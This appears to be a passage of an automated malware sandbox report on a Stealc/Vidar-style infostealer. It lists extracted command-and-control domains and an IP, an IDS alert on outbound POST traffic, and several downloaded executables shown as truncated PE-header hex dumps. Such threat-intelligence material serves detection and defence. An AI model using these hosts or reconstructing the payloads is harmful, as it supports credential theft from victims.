Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:50405 -> 116.203.10.31:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: fightlsoser.click
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.7:50034 -> 78.41.139.3:4000

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:53:22 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Fri, 13 Dec 2024 17:41:29 GMTETag: "126220-6292a5740451e"Accept-Ranges: bytesContent-Length: 1204768Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 71 5c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 e6 11 00 00 08 00 00 00 00 00 00 1e 04 12 00 00 20 00 00 00 20 12 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 12 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 03 12 00 4b 00 00 00 00 20 12 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 f0 11 00 20 72 00 00 00 40 12 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 e4 11 00 00 20 00 00 00 e6 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a6 05 00 00 00 20 12 00 00 06 00 00 00 e8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 12 00 00 02 00 00 00 ee 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 12 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 77 11 00 fc 8b 00 00 03 00 00 00 01 00 00 06 f4 56 00 00 e0 20 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 02 00 00 06 2a 32 72 01 00 00 70 28 06 00 00 06 26 2a 2e 28 04 00 00 06 28 20 00 00 0a 2a 32 28 03 00 00 06 02 6f 28 00 00 0a 2a 9a d0 1c 00 00 01 28 29 00 00 0a 72 61 00 00 70 28 05 00 00 06 02 28 2a 00 00 0a 16 8d 01 00 00 01 6f 2b 00 00 0a 2a 1e 02 28 2c 00 00 0a 2a ba 7e 01 00 00 04 3a 1e 00 00 00 72 ad 00 00 70 d0 08 00 00 02 28 29 00 00 0a 6f 2d 00 00 0a 73 2e 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 08 00 00 06 72 e9 00 00 70 7e 02 00 00 04 6f 2f 00 00 0a 74 0e 00 00 1b 2a 46 72 f9 00 00 70 73 12 00 00 06 16 28 4c 00 00 06 2a 2e 73 11 00 00 06 28 5c 00 00 06 2a 1e 02 80 06 00 00 04 2a 42 72 03 01 00 70 7e 06 00 00 04 28 30 00 00 0a 2a 4e 02 28 11 00 00 06 02 03 6f 38 00 00 0a 7d 0e 00 00 04 2a 3e 02 03 28 12 00 00 06 04 02 6f 39 00 00 0a 2a 76 02 03 28 12 00 00 06 04 39 0f 00 00 00 02 04 7d 14 00 00 04 04 02 6f 29 00 00 06 26 2a 1e 02 7b 13 00 00 04 2a 22 02 03 7d 13 00 00 04 2a 56 03
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:53:29 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:53:36 GMTContent-Type: application/octet-streamContent-Length: 393728Last-Modified: Thu, 12 Dec 2024 07:55:00 GMTConnection: keep-aliveETag: "675a96d4-60200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d8 27 f3 e3 9c 46 9d b0 9c 46 9d b0 9c 46 9d b0 82 14 08 b0 85 46 9d b0 82 14 1e b0 e0 46 9d b0 82 14 19 b0 b6 46 9d b0 bb 80 e6 b0 95 46 9d b0 9c 46 9c b0 18 46 9d b0 82 14 17 b0 9d 46 9d b0 82 14 09 b0 9d 46 9d b0 82 14 0c b0 9d 46 9d b0 52 69 63 68 9c 46 9d b0 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 66 a7 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 62 05 00 00 04 01 00 00 00 00 00 8f 51 00 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 24 00 00 04 00 00 d1 cf 06 00 02 00 00 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 67 05 00 64 00 00 00 00 30 06 00 98 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 61 05 00 00 10 00 00 00 62 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ab 00 00 00 80 05 00 00 60 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 7a 1e 00 00 30 06 00 00 3c 00 00 00 c6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:53:43 GMTContent-Type: application/octet-streamContent-Length: 1936384Last-Modified: Fri, 13 Dec 2024 17:26:12 GMTConnection: keep-aliveETag: "675c6e34-1d8c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 50 85 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 85 00 00 04 00 00 4f c3 1d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 88 84 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 28 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 62 6d 75 72 6b 6c 66 00 70 1a 00 00 d0 6a 00 00 68 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6c 74 72 70 72 73 61 00 10 00 00 00 40 85 00 00 06 00 00 00 64 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 85 00 00 22 00 00 00 6a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:53:51 GMTContent-Type: application/octet-streamContent-Length: 2660864Last-Modified: Thu, 12 Dec 2024 23:33:40 GMTConnection: keep-aliveETag: "675b72d4-289a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 28 00 00 04 00 00 64 6d 29 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 18 25 00 28 00 00 00 00 40 25 00 25 fb 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 28 00 1c 7f 00 00 80 0d 25 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 25 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 32 af 24 00 00 10 00 00 00 b0 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 5e 00 00 00 c0 24 00 00 60 00 00 00 b4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 14 00 00 00 20 25 00 00 0a 00 00 00 14 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 25 fb 02 00 00 40 25 00 00 fc 02 00 00 1e 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 7f 00 00 00 40 28 00 00 80 00 00 00 1a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:54:01 GMTContent-Type: application/octet-streamContent-Length: 965632Last-Modified: Fri, 13 Dec 2024 17:36:46 GMTConnection: keep-aliveETag: "675c70ae-ebc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a6 70 5c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 0c 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 b0 c9 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 68 51 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 51 01 00 00 40 0d 00 00 52 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 46 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:54:08 GMTContent-Type: application/octet-streamContent-Length: 1818112Last-Modified: Fri, 13 Dec 2024 17:38:05 GMTConnection: keep-aliveETag: "675c70fd-1bbe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 8e c1 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 7a 6a 63 7a 63 63 73 00 20 1a 00 00 c0 4f 00 00 1a 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 69 7a 63 6b 7a 71 6b 00 10 00 00 00 e0 69 00 00 04 00 00 00 98 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 9c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 